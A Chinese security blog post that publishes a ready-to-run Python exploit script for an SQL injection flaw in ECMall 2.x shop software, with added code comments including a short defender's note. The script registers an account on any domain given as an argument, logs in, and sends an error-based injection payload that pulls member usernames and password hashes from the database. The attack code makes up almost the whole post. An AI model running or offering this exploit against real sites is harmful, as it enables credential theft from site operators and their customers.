python编程:ecmall 2.x通杀SQL注入漏洞利用exp |

所属分类:Seay信息安全博客


今天看到的这个漏洞 {ecmall 2.x通杀SQL注入},在公司现在主要做安全研究,写了份分析报告,漏洞分析都要写exp,exp顺便发到博客来,写的比较简单。

PS:公司还缺两个安全服务工程师,一个安全研究员。安全服务工程师的招聘信息看:http://www.cnseay.com/3440/

 

EXP:

 

#coding=utf-8
#author:Seay
#blog:www.cnseay.com
  
import HTMLParser  
import urlparse  
import urllib
import urllib2  
import cookielib  
import string  
import re
import sys
  
# Module-level settings read by reguser() and login_exploit().
# `target` is only a default: __main__ rebinds it from argv[1].
# The account fields are fixed strings, so every run against a host
# registers the same member name -- easy to spot in the member table.
target = 'www.cnseay.com'
user_name = 'makelove'
password = 'onebyone'
email = '[email protected]'  # value as published on the page (redacted form)

def reguser():
    """Register a member account on ``target`` (module global).

    Side effects: installs a process-wide urllib2 opener holding a fresh
    cookie jar (every later urllib2.urlopen in this process goes through
    it), GETs the index page, then POSTs the registration form built from
    the module constants user_name/password/email.

    Returns nothing.  The response of the registration POST is never read,
    so a rejected registration (duplicate name, captcha, etc.) is not
    detected here; it only shows up when the later login fails.
    """

    print('user register...')
    hosturl = 'http://' + target + '/index.php'

    posturl = 'http://' + target + '/index.php?app=member&act=register&ret_url='
  
 
    # Fresh cookie jar installed globally, so the session cookie set by the
    # GET below is replayed automatically on the registration POST.
    cj = cookielib.LWPCookieJar()  
    cookie_support = urllib2.HTTPCookieProcessor(cj)  
    opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)  
    urllib2.install_opener(opener)  
  
       
    # Initial GET exists only to seed the cookie jar; `h` is never used.
    h = urllib2.urlopen(hosturl)  
  
     
    # Browser-like User-Agent; body is sent form-encoded (see urlencode below).
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',  
               'Content-Type' : 'application/x-www-form-urlencoded'}  
    
    # Registration form fields.  'agree' : '1' presumably mirrors the form's
    # agreement checkbox -- field names are not verified against the target.
    postData = {'user_name' : user_name,  
                'password' : password,  
                'password_confirm' : password, 
                'email' : email, 
                'agree' : '1', 
                }  
  
   
    # dict -> application/x-www-form-urlencoded string (rebinding the same name).
    postData = urllib.urlencode(postData)  
    
    request = urllib2.Request(posturl, postData, headers)
    # Response discarded: no success check of any kind.
    urllib2.urlopen(request)  
    

def login_exploit():
    """Log in with the account from reguser() and run the injection probe.

    Reads the module globals ``target``, ``user_name`` and ``password``.
    Flow: POST the login form, take the first cookie from the login
    response's Set-Cookie header, GET buyer_groupbuy/exit_group with a
    crafted ``id`` parameter, and grep the HTML for a MySQL
    "Duplicate entry" error.  Prints the extracted value, or
    'Sorry,failed' when the pattern is absent.  Returns nothing.

    Defender's note: this only works because ``id`` reaches the SQL layer
    unsanitized AND the raw database error text is echoed into the page.
    Casting ``id`` to int / using a prepared statement closes the injection;
    not surfacing DB errors in production removes the channel this script
    reads.  Requests with a non-numeric ``id`` on act=exit_group, and
    responses containing "Duplicate entry", are straightforward log/WAF
    signals for this probe.
    """

    print('user login...')
    hosturl = 'http://' + target + '/index.php' 
    
    posturl = 'http://' + target + '/index.php?app=member&act=login&synlogout=1'
  
    
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',  
               'Content-Type' : 'application/x-www-form-urlencoded'}  
 
    postData = {'user_name' : user_name,  
                'password' : password,  
                }  
  
    # Second process-wide opener + cookie jar; replaces the one reguser() installed.
    cj = cookielib.LWPCookieJar()  
    cookie_support = urllib2.HTTPCookieProcessor(cj)  
    opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)  
    urllib2.install_opener(opener)  

    postData = urllib.urlencode(postData)  

    request = urllib2.Request(posturl, postData, headers)
    
    # Login POST.  Only the Set-Cookie header of this response is used below;
    # the body is never checked, so a failed login is not detected here.
    response = urllib2.urlopen(request)  

    print('exploit...\n')
    # `id` carries the SQL injection string, URL-encoded with urllib.quote.
    # It embeds the table/column names (ecm_member.user_name, password) whose
    # values the duplicate-key error is expected to echo back.
    url='http://'+target+'/index.php?app=buyer_groupbuy&act=exit_group&id='+urllib.quote('1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b')
    # Keep only the first "name=value" pair of the Set-Cookie header.
    # Raises KeyError (unhandled) if the login response sets no cookie.
    cookies = response.headers["Set-cookie"].split(";")[0]

    # The cookie is attached by hand here rather than via the installed jar.
    request = urllib2.Request(url) 
    request.add_header('Cookie', cookies)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0')

    response = urllib2.urlopen(request)

    text = response.read() 
    response.close()

    # Looks for MySQL's echoed error "Duplicate entry '1<data>' for key ...";
    # the leading '1' is the floor(rand(0)*2) prefix from the concat() in the
    # payload, so group(1) is the user_name+password string (if present).
    prog = re.search("Duplicate entry '1(.*)' for key",text)
    # prog is None when the pattern is absent; .groups() then raises
    # AttributeError, which the bare except maps to the failure message.
    # NOTE(review): the bare except also hides any other error at this point.
    try:
        print('Success:'+prog.groups()[0])
    except:
        print('Sorry,failed')


if __name__ == '__main__':
    # Usage: <script> domain
    # argv[1] replaces the module-level `target` that reguser() and
    # login_exploit() read; registration is always attempted before login.
    if len(sys.argv)<2:
        print('argument error')
        print('example: '+sys.argv[0]+' domain')
        # NOTE: exits with status 0 even on a usage error.
        exit(0)
    target=sys.argv[1]
    reguser()
    login_exploit()

Tags:

ecmall漏洞, python编程,
